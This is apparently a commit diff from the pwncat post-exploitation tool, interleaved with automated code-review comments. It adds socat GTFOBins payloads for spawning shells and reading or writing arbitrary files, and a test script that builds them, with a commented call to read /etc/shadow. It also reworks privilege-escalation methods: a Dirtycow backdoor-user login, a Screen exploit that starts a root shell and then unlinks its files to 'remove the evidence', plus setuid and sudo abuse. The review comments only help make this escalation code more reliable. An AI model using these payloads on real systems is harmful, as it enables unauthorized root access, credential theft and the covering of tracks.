Changed privesc methods to use run() rather than process()... seems to work?? Added socat as a gtfobins
This commit is contained in:
parent
80c4e9839a
commit
84a5cb7deb
@ -11,6 +11,7 @@
|
|||||||
"payload": "{command} 2>/dev/null",
|
"payload": "{command} 2>/dev/null",
|
||||||
// This is used to pass arguments to the application (auto-merged
|
// This is used to pass arguments to the application (auto-merged
|
||||||
// into "{command}".
|
// into "{command}".
|
||||||
|
|
||||||
// IF YOUR COMMAND TAKES ARGUMENTS, YOU MUST SUPPLY THEM HERE.
|
// IF YOUR COMMAND TAKES ARGUMENTS, YOU MUST SUPPLY THEM HERE.
|
||||||
"args": ["if={lfile}"],
|
"args": ["if={lfile}"],
|
||||||
// Prepends arguments, if any to the "args" for setuid context.
|
// Prepends arguments, if any to the "args" for setuid context.
|
||||||
@ -261,13 +262,41 @@
|
|||||||
"type": "shell",
|
"type": "shell",
|
||||||
"payload": "TF=$({mktemp}); echo 'system(\"{shell}\")' > $TF; {command}",
|
"payload": "TF=$({mktemp}); echo 'system(\"{shell}\")' > $TF; {command}",
|
||||||
"args": ["--no-stop", "-q", "$TF"],
|
"args": ["--no-stop", "-q", "$TF"],
|
||||||
"exit": "exit"
|
"exit": "exit\n"
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
"type": "read",
|
"type": "read",
|
||||||
"payload": "TF=$({mktemp}); echo 'system(\"{cat} {lfile}\")' > $TF; {command}",
|
"payload": "TF=$({mktemp}); echo 'system(\"{cat} {lfile}\")' > $TF; {command}",
|
||||||
"args": ["--no-stop", "-q", "$TF"],
|
"args": ["--no-stop", "-q", "$TF"],
|
||||||
"exit": "exit"
|
"exit": "exit\n"
|
||||||
}
|
}
|
||||||
|
],
|
||||||
|
"socat": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["STDIN", "EXEC:{shell}"],
|
||||||
|
"exit": "exit\n"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-u", "FILE:{lfile}", "STDOUT"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "write",
|
||||||
|
"stream": "print",
|
||||||
|
"payload": "{command} 2>/dev/null",
|
||||||
|
"args": ["-u", "STDIN", "CREATE:{lfile}"],
|
||||||
|
"exit": "{ctrl_d}"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "write",
|
||||||
|
"stream": "base64",
|
||||||
|
"payload": "{base64} -d | {command} 2>/dev/null",
|
||||||
|
"args": ["-u", "STDIN", "CREATE:{lfile}"],
|
||||||
|
"exit": "{ctrl_d}"
|
||||||
|
}
|
||||||
|
|
||||||
]
|
]
|
||||||
}
|
}
|
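Review bot: The new socat `read` entry (`"args": ["-u", "FILE:{lfile}", "STDOUT"]`) carries no `exit` key, while the `shell` and both `write` entries in the same block and the existing entries above it all do; if the loader reads `exit` unconditionally this entry fails at build time, and if the key is optional the omission should at least look deliberate. The file already uses `//` comments, so a line such as `// "exit" intentionally omitted: no interactive session is left behind` would make the intent visible to the next reader. The same hunk changes `"exit": "exit"` to `"exit": "exit\n"` for the two existing entries; whether the rest of the file uses the trailing newline is not visible here, so the convention should be checked for consistency.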
@ -16,5 +16,24 @@ def which(path: str, quote=False):
|
|||||||
|
|
||||||
gtfo = GTFOBins("data/gtfobins.json", which)
|
gtfo = GTFOBins("data/gtfobins.json", which)
|
||||||
|
|
||||||
all_binaries = list(gtfo.iter_methods(Capability.SHELL))
|
|
||||||
print(all_binaries[0].build(shell="/bin/bash", suid=True))
|
binary_to_test = "socat"
|
||||||
|
capabilities_to_test = Capability.WRITE
|
||||||
|
our_shell = "/bin/bash"
|
||||||
|
|
||||||
|
socat = gtfo.find_binary(binary_to_test)
|
||||||
|
print(socat)
|
||||||
|
print(vars(socat))
|
||||||
|
|
||||||
|
methods = socat.iter_methods(
|
||||||
|
which(binary_to_test), caps=capabilities_to_test, stream=None
|
||||||
|
)
|
||||||
|
for method in methods:
|
||||||
|
print(method)
|
||||||
|
print(method.build(lfile="/tmp/test", data="hello")[0])
|
||||||
|
break
|
||||||
|
# print(method.build(shell=our_shell)[0])
|
||||||
|
# print(method.build(lfile="/etc/shadow", suid=True)[0])
|
||||||
|
|
||||||
|
# all_binaries = list(gtfo.iter_methods(Capability.SHELL))
|
||||||
|
# print(all_binaries[0].build(shell="/bin/bash", suid=True))
|
||||||
|
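Review bot: The loop over `methods` prints only the first method and then breaks, so anything further that `iter_methods` yields is never exercised, and an empty result is silent; `method = next(iter(methods), None)` followed by `if method is None: print("no method found")` states that intent directly. The commented-out calls left after the loop (`# print(method.build(shell=our_shell)[0])` and the old `all_binaries` lines) are leftover experiments and should be removed rather than kept as comments. The script continues before this hunk, where `which` is defined.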
@ -21,8 +21,8 @@ from pwncat import util
|
|||||||
|
|
||||||
# privesc_methods = [SetuidMethod, SuMethod]
|
# privesc_methods = [SetuidMethod, SuMethod]
|
||||||
# privesc_methods = [SuMethod, SudoMethod, SetuidMethod, DirtycowMethod, ScreenMethod]
|
# privesc_methods = [SuMethod, SudoMethod, SetuidMethod, DirtycowMethod, ScreenMethod]
|
||||||
privesc_methods = [SuMethod, SudoMethod, ScreenMethod, SetuidMethod]
|
# privesc_methods = [SuMethod, SudoMethod, SetuidMethod]
|
||||||
# privesc_methods = [SuMethod, SudoMethod]
|
privesc_methods = [SuMethod, SetuidMethod]
|
||||||
|
|
||||||
|
|
||||||
class Finder:
|
class Finder:
|
||||||
@ -302,8 +302,11 @@ class Finder:
|
|||||||
|
|
||||||
# Check if we ended up in a sub-shell without escalating
|
# Check if we ended up in a sub-shell without escalating
|
||||||
if self.pty.getenv("SHLVL") != shlvl:
|
if self.pty.getenv("SHLVL") != shlvl:
|
||||||
|
|
||||||
# Get out of this subshell. We don't need it
|
# Get out of this subshell. We don't need it
|
||||||
self.pty.process(exit_script, delim=False)
|
# self.pty.process(exit_script, delim=False)
|
||||||
|
self.pty.run(exit_script, wait=False)
|
||||||
|
self.pty.recvuntil("\n")
|
||||||
|
|
||||||
# Clean up whatever mess was left over
|
# Clean up whatever mess was left over
|
||||||
self.pty.flush_output()
|
self.pty.flush_output()
|
||||||
|
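Review bot: The active list `privesc_methods = [SuMethod, SetuidMethod]` now drops `SudoMethod` and `ScreenMethod`, with the previous list kept as a comment just above it; this reads as debugging state rather than an intended change, and the commit message does not mention it, so either restore `privesc_methods = [SuMethod, SudoMethod, ScreenMethod, SetuidMethod]` or state in the message why the two methods are disabled. Keeping superseded lines as comments also happens with `# self.pty.process(exit_script, delim=False)` in the second hunk and again in the SetuidMethod and SudoMethod hunks below; version control already holds them, so delete them. In the second hunk, `self.pty.recvuntil("\n")` is called with no timeout visible; if the exit script produces no output this would presumably block, so confirm `recvuntil` has a default timeout. The enclosing method of class Finder starts and ends outside that hunk.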
@ -90,7 +90,9 @@ class DirtycowMethod(Method):
|
|||||||
raise PrivescError("backdoor user not created")
|
raise PrivescError("backdoor user not created")
|
||||||
|
|
||||||
# Become the new user!
|
# Become the new user!
|
||||||
self.pty.process(f"su {self.pty.privesc.backdoor_user_name}", delim=False)
|
self.pty.run(f"su {self.pty.privesc.backdoor_user_name}", wait=False)
|
||||||
|
self.pty.recvuntil(": ")
|
||||||
|
|
||||||
self.pty.client.send(self.pty.privesc.backdoor_password.encode("utf-8") + b"\n")
|
self.pty.client.send(self.pty.privesc.backdoor_password.encode("utf-8") + b"\n")
|
||||||
|
|
||||||
return "exit"
|
return "exit"
|
||||||
|
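Review bot: `self.pty.recvuntil(": ")` after the `su` call waits for a prompt ending in `: `; if `su` fails before prompting, or the prompt is localized without that suffix, the call likely blocks, since no timeout is passed here. Consider bounding the wait if `recvuntil` supports that (its signature is not visible in this hunk) and raising `PrivescError`, as the line above does for the missing user, when the prompt is not seen. The enclosing method starts before the hunk.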
@ -148,7 +148,7 @@ class ScreenMethod(Method):
|
|||||||
self.pty.run("popd")
|
self.pty.run("popd")
|
||||||
|
|
||||||
# Start the root shell!
|
# Start the root shell!
|
||||||
self.pty.process(f"{rootshell}", delim=False)
|
self.pty.run(f"{rootshell}", wait=False)
|
||||||
|
|
||||||
# Remove the evidence
|
# Remove the evidence
|
||||||
self.pty.run(f"unlink {libhack_so} {libhack_c} {rootshell_c} {rootshell}")
|
self.pty.run(f"unlink {libhack_so} {libhack_c} {rootshell_c} {rootshell}")
|
||||||
|
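Review bot: `self.pty.run(f"{rootshell}", wait=False)` wraps a plain string in an f-string; `self.pty.run(rootshell, wait=False)` is equivalent and clearer. The `unlink` on the next line is sent immediately after starting the shell with `wait=False`, as it was with `process(..., delim=False)`; a comment such as `# sent to the root shell started above, not to the original shell` would make that ordering intentional for the next reader. The enclosing method starts before the hunk.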
@ -93,7 +93,8 @@ class SetuidMethod(Method):
|
|||||||
payload, input_data, exit_cmd = method.build(shell=self.pty.shell, suid=True)
|
payload, input_data, exit_cmd = method.build(shell=self.pty.shell, suid=True)
|
||||||
|
|
||||||
# Run the start commands
|
# Run the start commands
|
||||||
self.pty.process(payload, delim=False)
|
# self.pty.process(payload, delim=False)
|
||||||
|
self.pty.run(payload, wait=False)
|
||||||
|
|
||||||
# Send required input
|
# Send required input
|
||||||
self.pty.client.send(input_data.encode("utf-8"))
|
self.pty.client.send(input_data.encode("utf-8"))
|
||||||
|
@ -212,7 +212,8 @@ class SudoMethod(Method):
|
|||||||
)
|
)
|
||||||
|
|
||||||
# Run the commands
|
# Run the commands
|
||||||
self.pty.process(payload, delim=True)
|
# self.pty.process(payload, delim=True)
|
||||||
|
self.pty.run(payload, wait=True)
|
||||||
|
|
||||||
# This will check if the password is needed, and attempt to send it or
|
# This will check if the password is needed, and attempt to send it or
|
||||||
# fail, and return
|
# fail, and return
|
||||||
|
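Review bot: `self.pty.run(payload, wait=True)` is followed by code that, per the comment below it, detects a password prompt and answers it; if `wait=True` blocks until the command completes, a sudo that prompts for a password never completes and the prompt handling cannot run. This differs from the SetuidMethod and Finder hunks, which use `wait=False` for interactive commands; confirm what `wait` means on `run` and, if it waits for completion, change the line to `self.pty.run(payload, wait=False)`. The enclosing method and the password handling continue outside the hunk.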